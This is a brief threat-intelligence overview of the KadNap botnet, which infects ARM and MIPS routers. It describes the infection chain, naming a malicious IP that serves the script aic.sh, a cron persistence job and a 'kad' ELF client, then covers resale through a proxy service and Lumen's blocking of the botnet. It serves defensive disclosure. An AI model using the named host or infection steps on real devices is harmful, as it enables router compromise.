Overview
- Active since August 2025, the operation now averages roughly 14,000 infected edge devices, with about 60% located in the United States.
- The intrusion chain pulls aic.sh from 212.104.141.140, sets a cron job every 55 minutes, and installs a ‘kad’ ELF client that runs on ARM and MIPS routers.
- KadNap uses a custom Kademlia DHT for peer discovery, yet infected nodes consistently traverse two intermediary peers before reaching command servers, exposing a potential disruption point.
- Access to the hijacked routers is sold through the Doppelganger residential-proxy service, assessed as a rebrand of Faceless linked to TheMoon, enabling DDoS, credential stuffing, and brute-force activity.
- Lumen’s Black Lotus Labs blocked traffic to the botnet’s control infrastructure on its own network and plans to release indicators of compromise to support wider defensive efforts.